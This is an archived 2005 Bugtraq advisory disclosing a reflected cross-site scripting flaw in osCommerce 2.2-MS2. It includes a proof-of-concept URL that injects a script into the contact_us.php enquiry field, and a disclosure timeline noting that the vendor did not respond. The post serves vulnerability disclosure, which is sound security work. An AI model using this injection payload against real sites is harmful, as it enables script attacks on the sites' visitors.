[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200502152159.j1FLx91N025349@firebird.worldhq.net>
Date: Tue, 15 Feb 2005 21:59:20 -0000
From: "John Cobb" <johnc@...ytes.com>
To: <bugtraq@...urityfocus.com>
Subject: [NOBYTES.COM: #3] osCommerce 2.2-MS2 - XSS Vulnerability
Hello All,
I have discovered XSS vulnerability in: osCommerce 2.2-MS2
Authors Site: http://www.oscommerce.com/
+-[Example:]--------------------------------------------------+
XSS:
http://www.victimsite.com/contact_us.php?&name=1&email=1&enquiry=%3C/textare
a%3E%3Cscript%3Ealert('w00t');%3C/script%3E
Result:
A nice pop up box.
+-[Notes:]----------------------------------------------------+
Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet
Regards
John Cobb
JohnC@...ytes.com
http://www.nobytes.com
Powered by blists - more mailing lists